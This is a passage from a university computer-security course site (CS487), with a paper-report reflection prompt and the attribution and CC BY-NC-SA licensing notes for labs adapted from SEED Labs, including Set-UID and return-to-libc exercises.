If you were continuing this research, what is one specific improvement, extension, or new research question you would pursue?

Explain how your idea relates to the paper and how you might evaluate whether it works.

What You Should Be Able to Explain

After completing the report, you should be able to explain the following without referring to your report:

Problem → Key Insight → Approach → Evidence → Limitation

You may be asked in an in-class quiz to explain specific design choices, algorithms, examples, figures, or experimental results from the paper.

Attribution and License

SEED Labs

The lab exercises on this site are adapted from the SEED Labs project:

Copyright © 2006–2016 by Wenliang Du.

This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. If you remix, transform, or build upon the material, this copyright notice must be left intact, or reproduced in a way that is reasonable to the medium in which the work is being re-published.

Original lab materials, VM images, and setup files: https://seedsecuritylabs.org/

Lab 1 on this site is adapted from Environment Variable and Set-UID Program Lab (SEED Labs, Ubuntu 20.04 edition). Lab 2 is adapted from Return-to-libc Attack Lab (SEED Labs, Ubuntu 20.04 edition). In each case the task structure and code listings are Prof. Du’s; the UIC-specific setup notes, deliverables, grading criteria, and “understanding checks” are additions for CS487.

SEED Labs is supported by the US National Science Foundation. If you find the labs valuable, the accompanying textbook is Computer & Internet Security: A Hands-on Approach by Wenliang Du (https://www.handsonsecurity.net).

This site

The CS487-specific material on this site is © Xiaoguang Wang and is released under the same CC BY-NC-SA 4.0 license, as required by the ShareAlike term.

Built with mdBook.